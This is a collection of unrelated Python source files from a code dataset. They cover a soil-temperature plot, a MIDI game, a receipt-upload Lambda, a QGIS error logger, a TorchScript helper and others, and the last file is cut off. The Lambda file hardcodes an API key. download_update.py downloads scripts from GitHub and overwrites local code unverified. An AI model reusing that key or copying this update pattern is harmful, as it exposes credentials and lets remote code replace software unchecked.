NetworkTable(\"ISUAG\")\n ctx = util.get_autoplot_context(fdict, get_description())\n station = ctx['station']\n year = ctx['year']\n _ = nt.sts[station]\n oldstation = XREF.get(station, 'A130209')\n\n (fig, ax) = plt.subplots()\n climo = []\n cdays = []\n cursor.execute(\"\"\"\n SELECT extract(doy from valid) as d, avg(c30)\n from daily where station = %s GROUP by d ORDER by d ASC\n \"\"\", (oldstation, ))\n for row in cursor:\n climo.append(row[1])\n cdays.append(row[0])\n\n for yr in range(1988, today.year + 1):\n if yr in [1988, 1997]:\n continue\n x = []\n y = []\n if yr < 2014:\n units = 'F'\n cursor.execute(\"\"\"\n select valid, c30\n from daily WHERE station = '%s'\n and valid >= '%s-01-01' and valid < '%s-01-01' ORDER by valid ASC\n \"\"\" % (oldstation, yr, yr+1))\n else:\n units = 'C'\n cursor.execute(\"\"\"\n SELECT valid, tsoil_c_avg_qc from sm_daily WHERE\n station = '%s' and valid >='%s-01-01' and\n valid < '%s-01-01' and tsoil_c_avg_qc is not null\n ORDER by valid ASC\"\"\" % (station, yr, yr+1))\n for row in cursor:\n x.append(int(row[0].strftime(\"%j\")) + 1)\n y.append(temperature(row[1], units).value('F'))\n color = 'skyblue'\n if yr == year:\n color = 'r'\n ax.plot(x, y, color=color, label='%s' % (year,), lw=2, zorder=3)\n else:\n ax.plot(x, y, color=color, zorder=2)\n\n ax.plot(cdays, climo, color='k', label='Average')\n\n ax.set_title((\"ISU AgClimate [%s] %s \\n\"\n \"Site 4 inch Soil Temperature Yearly Timeseries\"\n ) % (station, nt.sts[station]['name']))\n ax.set_xlabel((\"* pre-2014 data provided by [%s] %s\"\n ) % (oldstation, oldnt.sts[oldstation]['name']))\n ax.grid(True)\n ax.set_ylabel('Daily Avg Temp $^{\\circ}\\mathrm{F}$')\n ax.set_xticks((1, 32, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 365))\n ax.set_xticklabels(calendar.month_abbr[1:])\n ax.set_xlim(0, 367)\n ax.set_ylim(-10, 90)\n ax.axhline(32, lw=2, color='purple', zorder=4)\n ax.set_yticks(range(-10, 90, 20))\n ax.legend(loc='best')\n\n return fig\n\n\nif __name__ == '__main__':\n plotter(dict())\n","sub_path":"htdocs/plotting/auto/scripts100/p145.py","file_name":"p145.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336315074","text":"__author__ = 'shawn'\n\nimport pygame, sys\nimport time\nfrom random import randint\nimport mido\nfrom threading import Thread\nfrom midi import logic\nfrom mido.midifiles import *\n\n\nclass PlayToContinue:\n def __init__(self):\n self.__states = {\"menu\": 0, \"play\": 1, \"playBack\": 2}\n self.__state = 
self.__states[\"menu\"]\n self.__bpm = 0\n self.__notes = []\n self.__loading = 0\n self.__note_start_time = 0\n self.__current_note_to_play = 0\n self.__recording = False\n self.__playing_game = False\n self.__of_name = \"\"\n\n self.__done = False\n self.__key_mod_size = logic.get_length_notes()\n\n pygame.init()\n pygame.mixer.init(44100, -16, 2, 1024)\n self.__screen = pygame.display.set_mode((640, 480))\n self.__clock = pygame.time.Clock()\n\n self.__note_font = pygame.font.Font(None, 148)\n self.__info_font = pygame.font.Font(None, 28)\n\n self.__display_center_message = self.__note_font.render(\"\", True, (0, 0, 0))\n self.commands = [\n self.__info_font.render(\"Press esc to quit\", True,(205, 92, 92)),\n self.__info_font.render(\"Press s to start\", True,(205, 92, 92)),\n self.__info_font.render(\"Press p to play back sound \", True,(205, 92, 92))]\n\n def start(self, bpm, note_file_name, out_file_name):\n self.__of_name = out_file_name\n self.__read_note_file(note_file_name)\n self.__bpm = bpm\n if not self.__screen: raise NotImplementedError(\"Class Not Initilized.\")\n self.__display_bpm = self.__info_font.render(\"bpm: \" + str(self.__bpm), True,(205, 92, 92))\n while not self.__done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.__done = True\n self.__set_and_update_center_message(\"hit any note\")\n continue\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n if self.__state == self.__states[\"menu\"]:\n self.__done = True\n self.__set_and_update_center_message(\"hit any note\")\n continue\n elif self.__state == self.__states[\"play\"]:\n self.__display_center_message = self.__note_font.render(\"\", True, (0, 0, 0))\n self.__state = self.__states[\"menu\"]\n if self.__state == self.__states[\"menu\"]:\n if event.type == pygame.KEYDOWN and event.key == pygame.K_s:\n self.__state = self.__states[\"play\"]\n self.__playing_game = True\n self.__loading = time.time()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_p:\n self.__state = self.__states[\"playBack\"]\n self.__loading = time.time()\n self.__playing_game = True\n\n if self.__state == self.__states[\"play\"]:\n self.__play_screen()\n if self.__state == self.__states[\"menu\"]:\n self.__menu_screen()\n if self.__state == self.__states[\"playBack\"]:\n self.__playback_screen()\n pygame.display.flip()\n self.__clock.tick(60)\n\n def __playback_screen(self):\n if not self.__playing_game:\n self.__state = self.__states[\"menu\"]\n return\n self.__screen.fill((255, 255, 255))\n if time.time() - self.__loading < 3:\n self.__set_and_update_center_message(\"Starting In: \" + str(round(3 - (time.time() - self.__loading))))\n self.__note_start_time = time.time()\n else:\n if not self.__recording:\n self.__play_music_from_file('new_song.mid')\n self.__recording = True\n self.__new_note()\n\n def __display_menu_commands(self):\n spacing = 2\n for key, command in enumerate(self.commands):\n self.__screen.blit(command, (2, spacing))\n spacing += command.get_height() + 2\n\n def __set_and_update_center_message(self, message):\n self.__display_center_message = self.__note_font.render(message, True, (0, 0, 0))\n self.__screen.blit(self.__display_center_message,\n (320 - self.__display_center_message.get_width() // 2, 240 - self.__display_center_message.get_height() // 2))\n\n def __menu_screen(self):\n self.__screen.fill((255, 255, 255))\n self.__screen.blit(self.__display_bpm, (self.__screen.get_width() - self.__display_bpm.get_width() - 2, 2))\n 
self.__set_and_update_center_message(\"Main Menu\")\n self.__display_menu_commands()\n self.__screen.blit(self.__display_center_message,\n (320 - self.__display_center_message.get_width() // 2, 240 - self.__display_center_message.get_height() // 2))\n\n def __play_screen(self):\n self.__screen.fill((255, 255, 255))\n if time.time() - self.__loading < 3:\n self.__set_and_update_center_message(\"Starting In: \" + str(round(3 - (time.time() - self.__loading))))\n self.__note_start_time = time.time()\n else:\n if not self.__recording and self.__playing_game:\n Thread(target=self.__start_midi_thread).start()\n print(\"recording Started\")\n self.__recording = True\n if not self.__playing_game:\n self.__play_end()\n else:\n self.__new_note()\n\n def __play_end(self):\n self.__set_and_update_center_message(\"hit any note\")\n if not self.__recording:\n self.__state = self.__states[\"menu\"]\n\n def __new_note(self):\n self.__set_and_update_center_message(self.__notes[0][self.__current_note_to_play])\n end_time = self.__bpm/60 * int(self.__notes[1][self.__current_note_to_play])\n\n self.__display_bpm = self.__info_font.render(\"New Note In: \" + str(round(end_time - (time.time() - self.__note_start_time))), True,(205, 92, 92))\n self.__screen.blit(self.__display_bpm, (self.__screen.get_width() - self.__display_bpm.get_width() - 2, 2))\n\n if time.time() - self.__note_start_time > end_time:\n self.__current_note_to_play += 1\n self.__note_start_time = time.time()\n if self.__current_note_to_play == len(self.__notes[0]):\n self.__current_note_to_play = 0\n self.__playing_game = False\n self.__display_bpm = self.__info_font.render(\"bpm: \" + str(self.__bpm), True,(205, 92, 92))\n\n def __start_midi_thread(self):\n last_note = int(round(time.time() * 1000))\n with MidiFile() as mid:\n track = MidiTrack()\n print(\"Waiting For Keyboard Input ... \")\n with mido.open_input() as inport:\n for msg in inport:\n if self.__done or not self.__playing_game:\n self.__recording = False\n mid.tracks.append(track)\n mid.save(self.__of_name)\n print(\"File Saved!\")\n print(\"File Location: \" + self.__of_name)\n self.__recording = False\n return\n now = int(round(time.time() * 1000))\n msg.time = now - last_note\n last_note = now\n if hasattr(msg, 'velocity') and msg.velocity == 0:\n msg = Message('note_off', note=msg.note, velocity=msg.velocity, time=msg.time)\n track.append(msg)\n\n def __read_note_file(self, file_name):\n\n beats = []\n notes = []\n with open(file_name) as fp:\n for line in fp:\n line = line.rstrip()\n beat,note = line.split(\" \")\n beats.append(beat)\n notes.append(note)\n self.__notes = [notes,beats]\n\n def __play_music_from_file(self, music_file):\n pygame.mixer.music.set_volume(0.8)\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"\\nMusic file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! 
(%s)\" % (music_file, pygame.get_error()) )\n return\n pygame.mixer.music.play()\n","sub_path":"pythonCode/games/lib/training_program.py","file_name":"training_program.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"529579071","text":"import time\n\nclass Combos:\n count = 1\n\n def find_combos(self, int_list, above_str):\n for i in range(0, len(int_list)):\n cur_combo = above_str + str(int_list[i])\n\n temp_list = list(int_list)\n temp_list.pop(i)\n\n if len(temp_list) != 0:\n self.find_combos(temp_list, cur_combo)\n else:\n print(str(self.count) + \": \" + str(cur_combo))\n self.count = self.count + 1\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n\n combos = Combos()\n combos.find_combos([1,2,3,4,5,6,7,8], \"\")\n\n end_time = time.time()\n print(\"Elapsed time was %g seconds\" % (end_time - start_time))\n","sub_path":"class Combos time.py","file_name":"class Combos time.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185609445","text":"import base64\nimport boto3\nimport boto3.session\nimport json\nimport pytz\nimport requests\nimport time\nimport uuid\n\nfrom datetime import datetime\nfrom pytz import timezone\nfrom tallyclient import TallyClient\n\nsession = boto3.session.Session(region_name='us-west-1')\ns3client = session.client('s3', config=boto3.session.Config(signature_version='s3v4'))\n\nclient = TallyClient(\"piper.phizzle.space\")\n\n\ndef lambda_handler(event, context):\n start_time = time.time()\n print(\"body length: %d\" % len(event['body']))\n print(\"first part of string: %s\" % event['body'][:100])\n\n current_date = datetime.now().replace(tzinfo=pytz.UTC)\n date_string = current_date.astimezone(timezone('US/Pacific')).strftime(\"%b-%y\")\n\n s3_key = \"%s/%s.pdf\" % (date_string.lower(), uuid.uuid4())\n\n s3client.put_object(\n Body=base64.b64decode(event['body']),\n Bucket='auto-receipts-storage',\n ContentType='application/pdf',\n Key=s3_key\n )\n\n headers = {'x-api-key': 'oZ67x41VBhaSJ6kPX40BhaqhiDcx9DYC9AZHFX3L'}\n response = requests.post('https://o0ocplke2d.execute-api.us-east-1.amazonaws.com/prod/generate-record',\n data=json.dumps({'s3_key': s3_key}), headers=headers)\n\n if response.status_code >= 300:\n print(response.status_code)\n end_time = time.time()\n client.gauge('piper.receiptReceiver.responseTime', int((end_time-start_time) * 1000))\n client.count('piper.receiptReceiver.%s' % response.status_code)\n raise BaseException(\"Could not generate record for receipt.\")\n\n end_time = time.time()\n client.gauge('piper.receiptReceiver.responseTime', int((end_time-start_time) * 1000))\n client.count('piper.receiptReceiver.200')\n return {\n 'statusCode': 200,\n 'headers': {},\n 'body': 'this is a really neat test'\n }\n","sub_path":"lambda/receiptReceiver/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"145690430","text":"import cv2\n\ndef face_detect(file_name, cascade_name):\n img = cv2.imread(file_name) # 读取图片\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 图片灰度化\n img_gray = cv2.equalizeHist(img_gray) # 直方图均衡化\n face_cascade = cv2.CascadeClassifier(cascade_name) # 加载级联分类器\n faces = face_cascade.detectMultiScale(img) # 多尺度检测\n for (x, y, w, h) in faces: # 遍历所有检测到的动漫脸\n img = cv2.rectangle(img, (x, y), 
(x+w, y+h), (255, 0, 255), 5) # 绘制矩形框\n    cv2.imshow('Face detection', img) # 检测效果预览\n    cv2.waitKey(0) # 保持窗口显示\n\nif __name__ == \"__main__\":\n    face_detect('img/anime/test_1.jpg', 'data/lbpcascades/anime/lbpcascade_animeface.xml')","sub_path":"anime_face_detect.py","file_name":"anime_face_detect.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"434851765","text":"from openerp.osv import fields,osv\nfrom openerp import tools\n \nclass account_invoice_parent(osv.osv):\n    _name = \"account.invoice.parent\"\n    _auto = False\n    _columns = {\n        'origin': fields.char('Source Document', size=64),\n        'date_invoice': fields.date('Invoice Date'),\n        'date_due': fields.date('Due Date'),\n\t'partner_id': fields.many2one('res.partner', string='Customer'),\n        'amount_total': fields.float('Total'),\n        'amount_tax': fields.float('Tax'),\n        'state': fields.selection([\n            ('draft','Draft'),\n            ('proforma','Pro-forma'),\n            ('proforma2','Pro-forma'),\n            ('open','Open'),\n            ('paid','Paid'),\n            ('cancel','Cancelled'),\n            ], 'Status'),\n        'amount_untaxed': fields.float('Subtotal'),\n        'type': fields.selection([\n            ('out_invoice','Customer Invoice'),\n            ('in_invoice','Supplier Invoice'),\n            ('out_refund','Customer Refund'),\n            ('in_refund','Supplier Refund'),\n            ],'Type', readonly=True, select=True, change_default=True, track_visibility='always'),\n        'fiscal_position': fields.many2one('account.fiscal.position', 'Fiscal Position'),\n        'journal_id': fields.many2one('account.journal', 'Journal'),\n        'account_id': fields.many2one('account.account', 'Account'),\n        'sent': fields.boolean('Sent'),\n\t'residual': fields.float('Balance'),\n        'reconciled': fields.boolean('Paid/Reconciled'),\n        'payment_term': fields.many2one('account.payment.term', 'Payment Terms'),\n        'comment': fields.text('Additional Information'),\n        'invoice_line': fields.one2many('account.invoice.line', 'invoice_id', 'Invoice Lines'),\n        'move_id': fields.many2one('account.move', 'Journal Entry', select=1),\n        'number': fields.related('move_id','name', type='char', size=64, relation='account.move' ,string='Number'),\n\t'parent':fields.integer('Parent'),\n    }\n    \n    def init(self, cr):\n        tools.sql.drop_view_if_exists(cr, 'account_invoice_parent')\n        cr.execute(\"\"\"\n            CREATE OR REPLACE VIEW account_invoice_parent AS (\n            select a.*,pa.name as parent, p.apoderado_admon, p.apoderado_aca\n            from op_student op\n            join op_parent_student_rel ps on ps.op_parent_id=op.id\n            join op_parent pa on pa.id=ps.op_student_id \n            join res_partner p on p.id=pa.name\n            join sale_order s on s.partner_id=op.partner_id\n            join sale_order_invoice_rel sa on sa.order_id=s.id\n            join account_invoice a on a.id=sa.invoice_id\n\t    where p.apoderado_admon=TRUE\n\t    )\n        \"\"\")\n        \naccount_invoice_parent()\n\n","sub_path":"facturacion/account_invoice_parent.py","file_name":"account_invoice_parent.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"471078019","text":"from flask import Flask, request, render_template, redirect, url_for, abort, flash, jsonify\nfrom points.results_table import ResultsTable\nfrom points.seasons import Seasons\n\n# create web application\napp = Flask(__name__, static_folder='webapp/static', template_folder='webapp/templates')\napp.config.from_envvar('WEBAPP_SETTINGS')\n\n\n@app.route('/championship/<championship_id>')\ndef championship(championship_id):\n    table = ResultsTable('http://organisation.mylaps.com/championship/view.jsp?id=' + str(championship_id))\n    return render_template(\"championship.html\", table=table)\n\n@app.route('/', defaults={'selected_season': None})\n@app.route('/<selected_season>')\ndef main_page(selected_season):\n    # load sanzaru page with the list of all sessions for each seasons\n    seasons = Seasons('http://www.mylaps.com/api/eventchampionships?id=' + str(118059))\n\n    season_years = seasons.get_season_years()\n    if selected_season is None:\n        selected_season = season_years[0]\n\n    season_data = seasons.get_season_data_by_year(selected_season)\n\n    return render_template(\"main.html\", season_data=season_data, season_years=season_years, selected_season=selected_season)\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=4567, threaded=True)\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"421455772","text":"from urllib.request import urlretrieve\nfrom urllib.request import urlopen\nfrom urllib.error import URLError\n\nversion_main = 15\nversion_database = 4\nversion_download_update = 5\nversion_input_wait = 2\nlist_update = []\n\n\ndef update_check():\n    no_updates = True\n    no_internet = False\n    try:\n        check_version = urlopen(\"https://raw.githubusercontent.com/LescautManon/Manon/master/update.txt\").read()\n    except URLError:\n        no_internet = True\n        print(\"Нет подключения к интернету\")\n        return no_updates, no_internet\n    check_version = check_version.decode('utf-8')\n    check_version = check_version.split(\"\\n\")\n    for i in check_version:\n        if i.isdigit():\n            list_update.append(int(i))\n    if (list_update[0] > version_main\n            or list_update[1] > version_database\n            or list_update[2] > version_download_update\n            or list_update[3] > version_input_wait):\n        no_updates = False\n        return no_updates, no_internet\n    else:\n        no_updates = True\n        print(\"Обновлений нет\")\n        return no_updates, no_internet\n\n\ndef update():\n    update_main = False\n    update_download = False\n    counter_updates = 0\n    if len(list_update) == 0:\n        print(\"Нет подключения к интернету\")\n        return update_main, update_download\n    else:\n        import re\n        if list_update[0] > version_main:\n            url = 'https://raw.githubusercontent.com/LescautManon/Manon/master/main.py'\n            filename = \"main.py\"\n            urlretrieve(url, filename)\n            print('update main.py OK')\n            old_version = version_main\n            new_version = list_update[0]\n            data = 
open('download_update.py').read()\n o = open('download_update.py', 'w')\n o.write(re.sub(f\"version_download_update = {old_version}\", f\"version_download_update = {new_version}\", data))\n o.close()\n counter_updates += 1\n update_download = True\n if list_update[3] > version_input_wait:\n url = 'https://raw.githubusercontent.com/LescautManon/Manon/master/input_wait.py'\n filename = \"input_wait.py\"\n urlretrieve(url, filename)\n print('update input_wait.py OK')\n old_version = version_input_wait\n new_version = list_update[3]\n data = open('download_update.py').read()\n o = open('download_update.py', 'w')\n o.write(re.sub(f\"version_input_wait = {old_version}\", f\"version_input_wait = {new_version}\", data))\n o.close()\n counter_updates += 1\n update_download = True\n if counter_updates == 0:\n print(\"Обновлений нет\")\n return update_main, update_download\n else:\n print(\"Обновление завершено. Для продолжения нажми enter\")\n return update_main, update_download\n","sub_path":"download_update.py","file_name":"download_update.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"490837211","text":"from qgis.PyQt.QtWidgets import qApp\nfrom qgis.PyQt.QtCore import QMetaObject, QObject, QSettings, QThread, Qt, pyqtSlot\nimport traceback, platform, os, uuid\nfrom qgis.PyQt.QtCore import QCoreApplication, QLocale, QThread\nfrom qgis.PyQt.QtWidgets import QPushButton, QApplication\nfrom qgis.core import Qgis, QgsMessageLog, qgsfunction, QgsMessageOutput\nfrom qgis.gui import QgsMessageBar\nfrom qgis.utils import iface, plugins\nfrom configparser import ConfigParser\nimport datetime\nimport os\nimport sys\nimport traceback\nimport glob\nimport os.path\nimport warnings\nimport codecs\nimport time\nimport functools\n\nfrom .postgresql import Postgresql\n\nclass ErroHandler(object):\n\n @staticmethod\n def show_message_log(pop_error=True):\n if pop_error:\n iface.messageBar().popWidget()\n\n iface.openMessageLog()\n\n @staticmethod\n def open_stack_dialog(etype, value, tb, msg, pop_error=True):\n if pop_error and iface is not None:\n iface.messageBar().popWidget()\n\n if msg is None:\n msg = QCoreApplication.translate('Python', 'An error has occurred while executing Python code:')\n\n # TODO Move this to a template HTML file\n txt = u'''{msg}\n
<br>\n<h3>{main_error}</h3>\n<pre>\n        {error}\n        </pre>\n<br>\n <b>{version_label}</b> {num}\n<br>\n <b>{qgis_label}</b> {qversion} {qgisrelease}, {devversion}\n<br>\n<h4>{pypath_label}</h4>\n<ul>    \n {pypath}\n</ul>'''\n\n        error = ''\n        lst = traceback.format_exception(etype, value, tb)\n        for s in lst:\n            error += s.decode('utf-8', 'replace') if hasattr(s, 'decode') else s\n        error = error.replace('\n', '<br>')\n\n        main_error = lst[-1].decode('utf-8', 'replace') if hasattr(lst[-1], 'decode') else lst[-1]\n\n        version_label = QCoreApplication.translate('Python', 'Python version:')\n        qgis_label = QCoreApplication.translate('Python', 'QGIS version:')\n        pypath_label = QCoreApplication.translate('Python', 'Python Path:')\n        txt = txt.format(msg=msg,\n                         main_error=main_error,\n                         error=error,\n                         version_label=version_label,\n                         num=sys.version,\n                         qgis_label=qgis_label,\n                         qversion=Qgis.QGIS_VERSION,\n                         qgisrelease=Qgis.QGIS_RELEASE_NAME,\n                         devversion=Qgis.QGIS_DEV_VERSION,\n                         pypath_label=pypath_label,\n                         pypath=u\"\".join(u\"<li>{}</li>\".format(path) for path in sys.path))\n\n        txt = txt.replace(' ', '&nbsp;')  # preserve whitespaces for nicer output\n\n        dlg = QgsMessageOutput.createMessageOutput()\n        dlg.setTitle(msg)\n        dlg.setMessage(txt, QgsMessageOutput.MessageHtml)\n        dlg.showMessage()\n\n    @staticmethod\n    def _showException(etype, value, tb, msg, messagebar=False):\n        if msg is None:\n            msg = 'An error has occurred while executing Python code:'\n\n        logmessage = ''\n        for s in traceback.format_exception(etype, value, tb):\n            logmessage += s.decode('utf-8', 'replace') if hasattr(s, 'decode') else s\n\n        title = 'Python error'\n        QgsMessageLog.logMessage(logmessage, title)\n\n        try:\n            blockingdialog = QApplication.instance().activeModalWidget()\n            window = QApplication.instance().activeWindow()\n        except:\n            blockingdialog = QApplication.activeModalWidget()\n            window = QApplication.activeWindow()\n\n        # Still show the normal blocking dialog in this case for now.\n        if blockingdialog or not window or not messagebar or not iface:\n            ErroHandler.open_stack_dialog(etype, value, tb, msg)\n            return\n\n        bar = iface.messageBar() if iface else None\n\n        # If it's not the main window see if we can find a message bar to report the error in\n        if not window.objectName() == \"QgisApp\":\n            widgets = window.findChildren(QgsMessageBar)\n            if widgets:\n                # Grab the first message bar for now\n                bar = widgets[0]\n\n        item = bar.currentItem()\n        if item and item.property(\"Error\") == msg:\n            # Return of we already have a message with the same error message\n            return\n\n        widget = bar.createMessage(title, msg + \" \" + \"See message log (Python Error) for more details.\")\n        widget.setProperty(\"Error\", msg)\n        stackbutton = QPushButton(\"Stack trace\", pressed=functools.partial(ErroHandler.open_stack_dialog, etype, value, tb, msg))\n        button = QPushButton(\"View message log\", pressed=ErroHandler.show_message_log)\n        widget.layout().addWidget(stackbutton)\n        widget.layout().addWidget(button)\n        bar.pushWidget(widget, Qgis.Warning)\n\n    @staticmethod\n    def get_plugins_versions():\n        plugins_versions = ''\n        for name, plugin in plugins.items():\n            try:\n                metadata_path = os.path.join(\n                    plugin.plugin_dir,\n                    'metadata.txt'\n                )\n                with open(metadata_path) as mf:\n                    cp = ConfigParser()\n                    cp.readfp(mf)\n                    plugins_versions += \"{0} : {1}\\n\".format(name, cp.get('general', 'version'))\n            except:\n                pass\n        return plugins_versions\n\n    @staticmethod\n    def showException(etype, value, tb, msg, *args, **kwargs):\n        erro_type = etype.__name__\n        description = ''\n        for s in traceback.format_exception(etype, value, tb):\n            description += s\n        description += \"{}\\n\".format(value)\n        if platform.system() == 'Linux':\n            user = os.environ['USER'] \n        else:\n            user = os.environ['USERNAME'] \n        mac = ':'.join(['{:02x}'.format((uuid.getnode() >> d) & 0xff) for d in range(0,8*6,8)][::-1]).upper()\n        qgis_version = Qgis.QGIS_VERSION\n        operational_system = platform.platform()\n        current_timestamp = datetime.datetime.now()\n        plugins_versions = ErroHandler.get_plugins_versions()\n        Postgresql().save_erro(\n            mac, \n            user, \n            current_timestamp, \n            erro_type, \n            description, \n            qgis_version, \n            operational_system, \n            plugins_versions\n        )\n        ErroHandler._showException(etype, value, tb, msg, True)\n\n    \n    \n    ","sub_path":"erroHandler.py","file_name":"erroHandler.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"481177577","text":"import pygame\n\n#制作游戏的窗口\ndef main():\n    #初始化导入的pygame模块\n    pygame.init()\n    #设置窗口的尺寸\n    screen = 
pygame.display.set_mode((800,600))\n #设置当前窗口的标题\n pygame.display.set_caption(\"打球吃小球\")\n running = True\n #开启一个事件循环 处理发生的事情\n while running:\n #从消息队列中获取事件对事件进行处理\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\nif __name__ == '__main__':\n main()","sub_path":"Day10/GUI/Pygame.py","file_name":"Pygame.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"652397168","text":"#! python\n\nimport time\nimport itertools\nimport math\nimport euler\nfrom decimal import *\n\ndef main():\n getcontext().prec = 150\n N = 101\n num_digits = 100\n power = Decimal(0.5)\n\n total_sum = 0\n for n in range(1, N):\n if not euler.is_square_number(n):\n d = Decimal(n)\n root = d ** power\n digital_sum = euler.digital_sum(root, num_digits)\n print(str(n) + ' : ' + str(digital_sum))\n total_sum += digital_sum\n print(total_sum)\n\nif __name__ == \"__main__\":\n start = time.time()\n main()\n print('RUNTIME: ', time.time() - start, 's')","sub_path":"p80.py","file_name":"p80.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"599312579","text":"from django.shortcuts import render, get_object_or_404\nfrom shop.models import Kategory, Product\nfrom cart.forms import CartAddProductForm\n\ndef ProductList(request, category_slug=None):\n category = None\n categories = Kategory.objects.all()\n products = Product.objects.filter(available=True)\n if category_slug:\n category = get_object_or_404(Kategory, short_desc=category_slug)\n products = products.filter(category=Product.kategory)\n return render(request, 'shop/product/list.html', {\n 'category': category,\n 'categories': categories,\n 'products': products,\n })\n\ndef ProductDetail(request, id, short_desc):\n product = get_object_or_404(Product, id=id, short_desc=short_desc, available=True)\n cart_product_form = CartAddProductForm()\n return render(request, 'shop/product/detail.html',\n {'product': product,\n 'cart_product_form':cart_product_form})","sub_path":"myownshop/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15460496","text":"import types\n\nimport torch\nfrom torch._C._jit_tree_views import (\n Apply,\n BinOp,\n Const,\n Expr,\n FalseLiteral,\n Ident,\n Select,\n Subscript,\n TrueLiteral,\n TupleLiteral,\n UnaryOp,\n)\n\nfrom pyctr.examples.torchscript import call_helper\nfrom pyctr.examples.torchscript.dmmy import dmmy_rng\nfrom pyctr.overloads import py_defaults\n\n\ndef gen_bin_op(op):\n def bin_op(this, other):\n return TorchExpr(BinOp(op, torch_expr(this), torch_expr(other)))\n\n return bin_op\n\n\ndef gen_method(name):\n def fun(this, *args, **kwargs):\n args = torch_expr(list(args))\n kwargs = call_helper.kwargs_to_attribute_list(kwargs)\n return TorchExpr(Apply(Select(this.node, Ident(dmmy_rng, name)), args, kwargs))\n\n return fun\n\n\n_operators = {\n \"__matmul__\": \"@\",\n \"__mul__\": \"*\",\n \"__add__\": \"+\",\n \"__sub__\": \"-\",\n \"__eq__\": \"==\",\n \"__ne__\": \"!=\",\n}\n\n\ndef add_operators(clazz):\n for o in _operators:\n setattr(clazz, o, gen_bin_op(_operators[o]))\n\n\ndef add_methods(clazz):\n _tmp = torch.ones(1)\n\n _attrs = dir(_tmp)\n\n for a in _attrs:\n if a[0] == \"_\":\n continue\n _typ = type(getattr(_tmp, a))\n if _typ == types.MethodType or _typ == 
types.BuiltinFunctionType:\n setattr(clazz, a, gen_method(a))\n\n\nclass TorchExpr:\n def __init__(self, node):\n if isinstance(node, Expr):\n self.node = node\n else:\n self.node = torch_expr(node)\n\n def __getitem__(self, item):\n return TorchExpr(Subscript(self.node, [torch_expr(item)]))\n\n def __neg__(self):\n return TorchExpr(UnaryOp(dmmy_rng, \"-\", self.node))\n\n\nadd_operators(TorchExpr)\nadd_methods(TorchExpr)\n\n\ndef torch_expr(e):\n ret = None\n\n # Constants\n if isinstance(e, bool):\n ret = TrueLiteral(dmmy_rng) if ret else FalseLiteral(dmmy_rng)\n elif isinstance(e, int) or isinstance(e, float):\n if e >= 0:\n ret = Const(dmmy_rng, str(e))\n else:\n ret = UnaryOp(dmmy_rng, \"-\", Const(dmmy_rng, str(abs(e))))\n elif isinstance(e, tuple):\n ret = TupleLiteral(dmmy_rng, list(map(lambda exp: torch_expr(exp), e)))\n elif isinstance(e, TorchExpr):\n ret = e.node\n elif isinstance(e, list):\n ret = list(map(lambda exp: torch_expr(exp), e))\n elif isinstance(e, Expr):\n ret = e\n elif isinstance(e, py_defaults.Variable):\n ret = torch_expr(e.val)\n else:\n raise TypeError(f\"Impossible to translate expression of type: {type(e)}\")\n return ret\n","sub_path":"pyctr/examples/torchscript/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357972909","text":"import genomicSignatures\nimport glob\n\n\n\n\ndef main():\n\n# (1) Prompt user to enter valid mer length\n\n merLength= 4\n\n\n#-------------------------------------------------------------------------------\n\n# (2) Get the files using glob and run through getDNA\n \n inputDIRECTORY= 'inputDIRECTORY3'\n fileList = glob.glob(inputDIRECTORY + '/*')\n fileList.sort()\n DNA= ''\n bugNumber= 0\n for nextFile in fileList:\n print(\"Opened a file\")\n DNA= genomicSignatures.getDNA(nextFile) \n\n#-------------------------------------------------------------------------------\n \n # (3) Break the read-in DNA into motifs\n \n originalMotifList= genomicSignatures.breakIntoMotifs(DNA, merLength)\n \n \n #-----------------------------------------------------------------------\n\n # (4) Count motifs\n \n originalMerFrequencies = {}\n \n genomicSignatures.countMotifs(originalMotifList, originalMerFrequencies)\n \n \n #------------------------------------------------------------------------\n \n # (6) \n \n \n \n\n #Create parallel lists for motif, frequencey, and proportion\n \n sortedMerFrequencies= sorted(originalMerFrequencies.items())\n numberOfMotifs= 